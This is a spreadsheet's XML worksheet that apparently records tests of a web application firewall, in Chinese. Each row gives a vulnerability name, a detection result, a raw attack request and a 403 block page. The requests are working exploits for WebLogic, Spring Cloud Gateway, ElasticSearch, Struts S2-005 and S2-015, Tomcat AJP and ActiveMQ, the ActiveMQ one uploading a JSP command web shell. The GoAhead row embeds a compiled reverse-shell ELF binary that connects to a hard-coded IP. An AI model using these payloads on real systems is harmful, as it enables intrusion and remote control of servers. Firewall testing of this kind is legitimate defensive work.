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38280" yWindow="4380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4">
    <font>
      <name val="等线"/>
      <charset val="134"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
      <scheme val="minor"/>
    </font>
    <font>
      <name val="微软雅黑"/>
      <charset val="134"/>
      <family val="2"/>
      <b val="1"/>
      <color rgb="FFFFFFFF"/>
      <sz val="10"/>
    </font>
    <font>
      <name val="宋体"/>
      <charset val="134"/>
      <family val="3"/>
      <color rgb="FF000000"/>
      <sz val="9"/>
    </font>
    <font>
      <name val="宋体"/>
      <charset val="134"/>
      <family val="3"/>
      <color rgb="FFFF0000"/>
      <sz val="9"/>
    </font>
    <font>
      <name val="等线"/>
      <charset val="134"/>
      <family val="2"/>
      <sz val="9"/>
      <scheme val="minor"/>
    </font>
    <font>
      <name val="Segoe UI"/>
      <charset val="238"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Arial"/>
      <charset val="178"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Sylfaen"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Yu Gothic"/>
      <charset val="128"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Malgun Gothic"/>
      <charset val="129"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Segoe UI Historic"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Tahoma"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Segoe UI"/>
      <charset val="161"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Nirmala UI"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Cambria Math"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Segoe UI"/>
      <charset val="204"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Tahoma"/>
      <charset val="1"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Tahoma"/>
      <charset val="238"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Arial"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="等线"/>
      <family val="1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Microsoft New Tai Lue"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Gadugi"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="MS Gothic"/>
      <charset val="128"/>
      <family val="3"/>
      <color theme="1"/>
      <sz val="11"/>
    </font>
  </fonts>
  <fills count="4">
    <fill>
      <patternFill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ouble">
        <color indexed="64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1">
    <xf numFmtId="0" fontId="0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 wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="2" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment horizontal="justify" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="2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F136"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A4" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="C4" sqref="C4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="8" defaultRowHeight="14.15" outlineLevelCol="0"/>
  <cols>
    <col width="39.78515625" customWidth="1" style="6" min="1" max="1"/>
    <col width="110.640625" customWidth="1" style="6" min="3" max="3"/>
  </cols>
  <sheetData>
    <row r="1" ht="15.45" customHeight="1" s="6" thickBot="1" thickTop="1">
      <c r="A1" s="4" t="inlineStr">
        <is>
          <t>Wow!</t>
        </is>
      </c>
      <c r="B1" s="1" t="inlineStr">
        <is>
          <t>检测能力</t>
        </is>
      </c>
      <c r="C1" s="0" t="inlineStr">
        <is>
          <t>攻击载荷</t>
        </is>
      </c>
    </row>
    <row r="2" ht="15" customHeight="1" s="6" thickBot="1" thickTop="1">
      <c r="A2" s="2" t="inlineStr">
        <is>
          <t>WebLogic代码执行_1（CVE-2020-14882）</t>
        </is>
      </c>
      <c r="B2" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C2" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Accept-Encoding: identity
cmd: pwd
</t>
        </is>
      </c>
      <c r="D2" s="0" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
&lt;title&gt;403&lt;/title&gt;
&lt;style type="text/css"&gt;
body {
    background-color: #f3f3f4;
    color: #676a6c;
    height: 100%;
    font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";
}
.middle-box {
  max-width: 600px;
  z-index: 100;
  margin: 0 auto;
  padding-top: 40px;
  text-align: center;
}
.middle-box h1 {
  font-size: 170px;
  font-weight: 100;
  margin-top: 20px;
  margin-bottom: 10px;
}
.btn {
  border-radius: 3px;
  font-size: inherit;
  display: inline-block;
  width: 100px;
  height: 30px;
  line-height: 30px;
  background-color: #1ab394;
  border-color: #1ab394;
  color: #fff;
  cursor: pointer;
  font-size: 14px;
}
.btn:hover {
  background-color: #1c8570;
}
.btn:active {
  background-image: none;
  outline: 0;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.buttons {
    margin-top: 30px;
}
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;div class="middle-box"&gt;
        &lt;h1&gt;403&lt;/h1&gt;
        &lt;h3 class="font-bold"&gt;Forbidden&lt;/h3&gt;
        &lt;div class="error-desc"&gt;å æéé®é¢æè¡ä¸ºéæ³ï¼æ¨çè®¿é®è¢«æç»ã&lt;/div&gt;
        &lt;div class="buttons"&gt;&lt;a class="btn btn-primary" onclick="javascript:history.back()"&gt;è¿å&lt;/a&gt;&lt;/div&gt;
    &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
&lt;span style="position: absolute;bottom: 0;left: 50%;transform: translate(-50%, 0);"&gt;Request ID:  7462928061072146445&lt;/span&gt;</t>
        </is>
      </c>
      <c r="E2" t="n">
        <v>403</v>
      </c>
      <c r="F2" t="inlineStr">
        <is>
          <t>7462928061072146445</t>
        </is>
      </c>
    </row>
    <row r="3" ht="269.15" customHeight="1" s="6" thickBot="1">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Spring Cloud Gateway 远程代码执行</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>POST /actuator/gateway/routes/hacktest HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Content-Length: 307
Accept-Encoding: identity
Content-Type: application/json
{
  "id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
  "name": "Result",
  "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
  }],
  "uri": "http://example.com"
}</t>
        </is>
      </c>
      <c r="D3" s="0" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
&lt;title&gt;403&lt;/title&gt;
&lt;style type="text/css"&gt;
body {
    background-color: #f3f3f4;
    color: #676a6c;
    height: 100%;
    font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";
}
.middle-box {
  max-width: 600px;
  z-index: 100;
  margin: 0 auto;
  padding-top: 40px;
  text-align: center;
}
.middle-box h1 {
  font-size: 170px;
  font-weight: 100;
  margin-top: 20px;
  margin-bottom: 10px;
}
.btn {
  border-radius: 3px;
  font-size: inherit;
  display: inline-block;
  width: 100px;
  height: 30px;
  line-height: 30px;
  background-color: #1ab394;
  border-color: #1ab394;
  color: #fff;
  cursor: pointer;
  font-size: 14px;
}
.btn:hover {
  background-color: #1c8570;
}
.btn:active {
  background-image: none;
  outline: 0;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.buttons {
    margin-top: 30px;
}
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;div class="middle-box"&gt;
        &lt;h1&gt;403&lt;/h1&gt;
        &lt;h3 class="font-bold"&gt;Forbidden&lt;/h3&gt;
        &lt;div class="error-desc"&gt;å æéé®é¢æè¡ä¸ºéæ³ï¼æ¨çè®¿é®è¢«æç»ã&lt;/div&gt;
        &lt;div class="buttons"&gt;&lt;a class="btn btn-primary" onclick="javascript:history.back()"&gt;è¿å&lt;/a&gt;&lt;/div&gt;
    &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
&lt;span style="position: absolute;bottom: 0;left: 50%;transform: translate(-50%, 0);"&gt;Request ID:  7462928065367113742&lt;/span&gt;</t>
        </is>
      </c>
      <c r="E3" t="n">
        <v>403</v>
      </c>
      <c r="F3" t="inlineStr">
        <is>
          <t>7462928065367113742</t>
        </is>
      </c>
    </row>
    <row r="4" ht="255" customHeight="1" s="6" thickBot="1">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>ActiveMQ任意文件写入</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>PUT /fileserver/2.txt HTTP/1.1
Content-Length: 359
&lt;%@ page import="java.io.*"%&gt;
&lt;%
  out.print("Cytosine Test&lt;br&gt;");
  String strcmd = request.getParameter("cmd");
  String line = null;
  Process p = Runtime.getRuntime().exec(strcmd);
  BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
  while((line=br.readLine())!=null){
    out.print(line+"&lt;br&gt;");
  }
%&gt;</t>
        </is>
      </c>
      <c r="D4" s="0" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
&lt;title&gt;403&lt;/title&gt;
&lt;style type="text/css"&gt;
body {
    background-color: #f3f3f4;
    color: #676a6c;
    height: 100%;
    font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";
}
.middle-box {
  max-width: 600px;
  z-index: 100;
  margin: 0 auto;
  padding-top: 40px;
  text-align: center;
}
.middle-box h1 {
  font-size: 170px;
  font-weight: 100;
  margin-top: 20px;
  margin-bottom: 10px;
}
.btn {
  border-radius: 3px;
  font-size: inherit;
  display: inline-block;
  width: 100px;
  height: 30px;
  line-height: 30px;
  background-color: #1ab394;
  border-color: #1ab394;
  color: #fff;
  cursor: pointer;
  font-size: 14px;
}
.btn:hover {
  background-color: #1c8570;
}
.btn:active {
  background-image: none;
  outline: 0;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.buttons {
    margin-top: 30px;
}
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;div class="middle-box"&gt;
        &lt;h1&gt;403&lt;/h1&gt;
        &lt;h3 class="font-bold"&gt;Forbidden&lt;/h3&gt;
        &lt;div class="error-desc"&gt;å æéé®é¢æè¡ä¸ºéæ³ï¼æ¨çè®¿é®è¢«æç»ã&lt;/div&gt;
        &lt;div class="buttons"&gt;&lt;a class="btn btn-primary" onclick="javascript:history.back()"&gt;è¿å&lt;/a&gt;&lt;/div&gt;
    &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
&lt;span style="position: absolute;bottom: 0;left: 50%;transform: translate(-50%, 0);"&gt;Request ID:  7462928065368162318&lt;/span&gt;</t>
        </is>
      </c>
      <c r="E4" t="n">
        <v>403</v>
      </c>
      <c r="F4" t="inlineStr">
        <is>
          <t>7462928065368162318</t>
        </is>
      </c>
    </row>
    <row r="5" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A5" s="2" t="inlineStr">
        <is>
          <t>ElasticSearch Groovy 沙盒绕过 &amp;&amp; 代码执行</t>
        </is>
      </c>
      <c r="B5" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C5" s="0" t="inlineStr">
        <is>
          <t>POST /_search?pretty HTTP/1.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}</t>
        </is>
      </c>
      <c r="D5" s="0" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
&lt;title&gt;403&lt;/title&gt;
&lt;style type="text/css"&gt;
body {
    background-color: #f3f3f4;
    color: #676a6c;
    height: 100%;
    font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";
}
.middle-box {
  max-width: 600px;
  z-index: 100;
  margin: 0 auto;
  padding-top: 40px;
  text-align: center;
}
.middle-box h1 {
  font-size: 170px;
  font-weight: 100;
  margin-top: 20px;
  margin-bottom: 10px;
}
.btn {
  border-radius: 3px;
  font-size: inherit;
  display: inline-block;
  width: 100px;
  height: 30px;
  line-height: 30px;
  background-color: #1ab394;
  border-color: #1ab394;
  color: #fff;
  cursor: pointer;
  font-size: 14px;
}
.btn:hover {
  background-color: #1c8570;
}
.btn:active {
  background-image: none;
  outline: 0;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.buttons {
    margin-top: 30px;
}
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;div class="middle-box"&gt;
        &lt;h1&gt;403&lt;/h1&gt;
        &lt;h3 class="font-bold"&gt;Forbidden&lt;/h3&gt;
        &lt;div class="error-desc"&gt;å æéé®é¢æè¡ä¸ºéæ³ï¼æ¨çè®¿é®è¢«æç»ã&lt;/div&gt;
        &lt;div class="buttons"&gt;&lt;a class="btn btn-primary" onclick="javascript:history.back()"&gt;è¿å&lt;/a&gt;&lt;/div&gt;
    &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
&lt;span style="position: absolute;bottom: 0;left: 50%;transform: translate(-50%, 0);"&gt;Request ID:  7462928065369210894&lt;/span&gt;</t>
        </is>
      </c>
      <c r="E5" t="n">
        <v>403</v>
      </c>
      <c r="F5" t="inlineStr">
        <is>
          <t>7462928065369210894</t>
        </is>
      </c>
    </row>
    <row r="6" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Tomcat AJP 文件包含漏洞利用</t>
        </is>
      </c>
      <c r="B6" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C6" s="0" t="inlineStr">
        <is>
          <t>_x0012_4_x0001__x0002__x0002__x0008_HTTP/1.1_x0005_/asdf_x000F_192.168.137.139_x000F_192.168.137.139P	_x0006_
keep-alive_x000F_Accept-Language_x000E_en-US,en;q=0.5_x0008__x0001_0_x000F_Accept-Encoding_x0013_gzip, deflate, sdch
Cache-Control	max-age=0_x000E_ Mozilla_x0019_Upgrade-Insecure-Requests_x0001_1_x0001_	text/html_x000B__x000F_192.168.137.139
!javax.servlet.include.request_uri_x0001_/
_x001F_javax.servlet.include.path_info_x000F_WEB-INF/web.xml
"javax.servlet.include.servlet_path_x0001_/</t>
        </is>
      </c>
      <c r="D6" s="0">
        <f>_xlfn.ENCODEURL(C6)</f>
        <v/>
      </c>
    </row>
    <row r="7" ht="409.6" customHeight="1" s="6" thickBot="1">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t>GoAhead 远程命令执行</t>
        </is>
      </c>
      <c r="B7" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>POST /cgi-bin/index?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1
User-Agent: curl/7.55.1
Accept: */*
Content-Length: 8584
Content-Type: application/x-www-form-urlencoded
Expect: 100-continue
ELF_x0002__x0001__x0001__x0003_&gt;_x0001_@_x0008_@H_x001A_@8 @_x001D__x001A__x0001__x0005_䊀䊀 _x0001__x0006_荀荠荠_x0002__x0002_ _x0002__x0006__x0008__x000E__x0008__x000E_ _x0008__x000E_ _x0001__x0001__x0008__x0004__x0004_ȁȁȁ$$_x0004_P崤_x0004_d
d
d
_x001C__x001C__x0004_Q崤_x0006__x0010_R崤_x0004_荀荠荠_x0018__x0002__x0018__x0002__x0001__x0004__x0014__x0003_GNUg)î^x.lV_x0006_hh_x0005__x0018_ـ_x0003__x000F__x0001__x0006_Р_x0001__x0004_P	_x000F__x0013__x0015_BEլ4㏞㒼aرX_x001C__x000E_듯_x000E__x0003_	 _x001C_ _x0012__x0012__x0012__x0012__x0012__x0001_ a _x0012__x0012_8 R"_x0012_ր_x0010__x0017_p_x0010_ u_x0011__x0017_h_x0010_ _x0008_退_x0010__x0018_x_x0010_ _x0011__x0017_`_x0010_ _x0004_݀_x0010__x0018_p_x0010_ _x0010__x0012_	 _x0016__x0012_
D
__gmon_start___init_fini_ITM_deregisterTMCloneTable_ITM_registerTMCloneTable__cxa_finalize_Jv_RegisterClassesserver_ipserver_portsockethtonsinet_addrconnectexitdup2execve__stack_chk_faillibc.so.6_edata__bss_start_endGLIBC_2.2.5GLIBC_2.4_x0002__x0003__x0003__x0003__x0003__x0003__x0003__x0003__x0003__x0001__x0001__x0001__x0001__x0001__x0001__x0001__x0001__x0002_̀_x0010_u_x001A_i	_x0003__x0010__x0014_ii
_x0002_荠_x0008__x0010_	
 _x0008_@	
 _x0008_ЈX_x0010_ _x0008_X_x0010_ h_x0010_ _x0008_M
ȏ _x0006__x0002_Џ _x0006__x0010_؏ _x0006__x0008_Ϡ_x0006__x0012_菠_x0006_	_x000F_ _x0006__x000C__x000F_ _x0006_
_x0018__x0010_  _x0003_ _x0010_  _x0004_(_x0010_  _x0005_0_x0010_  _x0006_8_x0010_   @_x0010_  
H_x0010_  _x000B_P_x0010_  _x000E_H숈_x0005_M_x0008_ H4_x0005_蛀HĈÀ5b_x0008_ %d_x0008_ _x000F__x001F_@%b_x0008_ h頿%Z_x0008_ h_x0001_鐿%R_x0008_ h_x0002_逿%J_x0008_ h_x0003_鰿%B_x0008_ h_x0004_頿%:_x0008_ h_x0005_鐿%2_x0008_ h_x0006_逿%*_x0008_ h 鰿%  f%  fH=)_x0008_ H_x0005_)_x0008_ UH)H刃_x000E_v_x0015_H_x0005_f  H4	]এ_x001F_D]Ï_x001F_@f._x000F__x001F_H=釠H5⇠UH)H刁_x0003_HHh?H_x0001_ƈѾt_x0018_H_x0005_A  H4_x000C_]এ_x001F_]Ï_x001F_@f._x000F__x001F_=  u'H=_x0017_  UH崌H=j  腿舿]ƅp  _x0001_Ï_x001F_@f._x000F__x001F_H=鄠H?u_x000B_鞿f_x000F__x001F_DH_x0005__x0006_ H4镈忐]逿UH刃찤H_x0004_%(HE1:_x0001__x0002_赾E܈ǅHǅ耀fǅH_x0005_U_x0006_ _x000F_	Ǩ)fE∋_x0005_._x0006_ HHǸ达E䈍M˅ܺ_x0010_HΉǨE4
觾EܾǸ製Eܾ_x0001_Ǹ菽Eܾ_x0002_Ǹ軽H=5赽HEdH3_x0004_%(t_x0005_谽ɃH숈Ĉñ0.82.200.214/bin/sh_x0001__x001B__x0003_;_x0018__x0002_&lt;4ܾ\_x0014__x0001_zR_x0001_x_x0010__x0001__x001B__x000C_ _x0008__x0001_$_x001C__x000E__x0010_F_x000E__x0018_J_x000F__x000B_w_x0008_?_x001A_;*3$"_x001C_Dx_x0002__x0001_A_x000E__x0010__x0002_C
_x0006__x0002__x000C_ _x0008__x0010_	@	Ј_x0001_̀_x000C_ 
D
_x0019_荠_x001B__x0010__x001A_
 _x001C__x0008_o_x0001__x0005_@_x0004__x0006_0_x0002_
_x0004__x0001__x000B__x0018__x0003__x0010_ _x0002__x0014_ _x0017__x0006_ _x0005__x0008_ _x0001_	_x0018_op_x0005_o_x0001_oD_x0005_o_x0005__x0008__x000E_  Ƈև懀 _x0006__x0008__x0016__x0008_&amp;_x0008_X_x0010_ _x0013_M
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609_x0003__x0001_ȁ_x0003__x0002__x0001__x0003__x0003_0_x0002__x0003__x0004_@_x0004__x0003__x0005_D_x0005__x0003__x0006_p_x0005__x0003_ _x0005__x0003__x0008__x0006__x0003_	 _x0003_
 _x0003__x000B_0_x0008__x0003__x000C_@_x0008__x0003_
D
_x0003__x000E_M
_x0003__x000F_d
_x0003__x0010_
_x0003__x0011_荠_x0003__x0012_
 _x0003__x0013__x000E_ _x0003__x0014__x0008__x000E_ _x0003__x0015_ȏ _x0003__x0016__x0010_ _x0003__x0017_X_x0010_ _x0003__x0018_p_x0010_ _x0003__x0019__x0001__x0004__x000C__x0001__x0013__x000E_ _x0019__x0002__x000C_@_x0008__x001B__x0002__x000C__x0008_._x0002__x000C_ЈD_x0001__x0018_p_x0010_ _x0001_S_x0001__x0012_
 z_x0002__x000C__x0010_	_x0001__x0011_荠_x0004__x0002__x000C_@	_x0002__x0001__x0001__x0004__x0001__x0010_ʀǀ_x0001__x0013__x000E_ _x0004_Ӏ_x0001__x0017_X_x0010_ _x0001__x0014__x0008__x000E_ 退_x000F_d
_x0001__x0017_p_x0010_ _x0008__x0001__x0001__x0016__x0010_ _x001E__x0001_ :_x0001__x0010__x0017_p_x0010_ A_x0001__x0012_
D
G_x0001__x0012_c_x0001__x0012_v_x0001__x0012__x0001__x0011__x0017_h_x0010_ _x0008__x0001__x0012__x0001__x0012__x0001_ ́_x0010__x0018_x_x0010_ с_x0010__x0018_p_x0010_ ݁_x0011__x0017_`_x0010_ _x0004_遀 _x0001__x0012__x000F__x0002__x0012_$_x0002_ &gt;_x0002_"Z_x0002__x0012_	 `_x0002__x0012_crtstuff.c__JCR_LIST__deregister_tm_clones__do_global_dtors_auxcompleted.7594__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryexp.creverse_shell__FRAME_END____JCR_END____dso_handle_DYNAMIC__GNU_EH_FRAME_HDR__TMC_END___GLOBAL_OFFSET_TABLE__ITM_deregisterTMCloneTable_edata_fini__stack_chk_fail@@GLIBC_2.4htons@@GLIBC_2.2.5dup2@@GLIBC_2.2.5server_ipexecve@@GLIBC_2.2.5inet_addr@@GLIBC_2.2.5__gmon_start___end__bss_startserver_port_Jv_RegisterClassesexit@@GLIBC_2.2.5connect@@GLIBC_2.2.5_ITM_registerTMCloneTable__cxa_finalize@@GLIBC_2.2.5_initsocket@@GLIBC_2.2.5.symtab.strtab.shstrtab.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.plt.data.bss.comment_x001B_ _x0002_ȁȁ$_x0004_.o_x0002__x0001__x0001_@_x0003__x0008_8_x000B__x0002_0_x0002_0_x0002__x0010__x0002__x0004__x0002__x0008__x0018_@_x0003__x0002_@_x0004_@_x0004__x0004__x0001__x0001_Ho_x0002_D_x0005_D_x0005_,_x0003__x0002__x0002_Uo_x0002_p_x0005_p_x0005_0_x0004__x0001__x0008_d_x0004__x0002__x0005__x0005_ _x0001__x0003__x0008__x0018_n_x0004_B_x0006__x0006__x0003__x0016__x0008__x0018_x_x0001__x0006_  _x001A__x0004_s_x0001__x0006_  _x0010__x0010_~_x0001__x0006_0_x0008_0_x0008__x0010__x0008__x0001__x0006_@_x0008_@_x0008__x0002__x0002__x0010__x0001__x0006_D
D
	_x0004__x0001__x0002_M
M
_x0016__x0001__x0001__x0002_d
d
_x001C__x0004__x0001__x0002_
d_x0008__x000E__x0003_荠荀_x0010__x0008__x000F__x0003_
_x0008__x0008_ˀ_x0001__x0003__x000E_ _x000E__x0008__x0008_Ѐ_x0006__x0003__x0008__x000E_ _x0008__x000E__x0001__x0004__x0008__x0010__x0001__x0003_ȏ ȏ8_x0008__x0008_ـ_x0001__x0003__x0010_ _x0010_X_x0008__x0008_ _x0001__x0003_X_x0010_ X_x0010__x0018__x0008_耀_x0008__x0003_p_x0010_ p_x0010__x0008__x0001_퀀_x0001_0p_x0010_5_x0001__x0001__x0011__x0003_L_x0019__x0001__x0001__x0002__x0010_0_x0006__x001C_._x0008__x0018_	_x0003_ؖt_x0002__x0001_</t>
        </is>
      </c>
      <c r="D7" s="0">
        <f>_xlfn.ENCODEURL(C7)</f>
        <v/>
      </c>
    </row>
    <row r="8" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t>S2-005 远程代码执行(CVE-2010-1870)</t>
        </is>
      </c>
      <c r="B8" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C8" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&amp;(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&amp;(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success3%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D8" s="0">
        <f>_xlfn.ENCODEURL(C8)</f>
        <v/>
      </c>
    </row>
    <row r="9" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t>S2-015 远程代码执行(CVE-2013-2135, CVE-2013-2134)</t>
        </is>
      </c>
      <c r="B9" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C9" s="0" t="inlineStr">
        <is>
          <t>GET /%24%7b%23%63%6f%6e%74%65%78%74%5b%27%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%27%5d%3d%66%61%6c%73%65%2c%23%6d%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%44%65%63%6c%61%72%65%64%46%69%65%6c%64%28%27%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%27%29%2c%23%6d%2e%73%65%74%41%63%63%65%73%73%69%62%6c%65%28%74%72%75%65%29%2c%23%6d%2e%73%65%74%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2c%74%72%75%65%29%2c%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%77%68%6f%61%6d%69%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%2c%23%71%7d.action HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close</t>
        </is>
      </c>
      <c r="D9" s="0">
        <f>_xlfn.ENCODEURL(C9)</f>
        <v/>
      </c>
    </row>
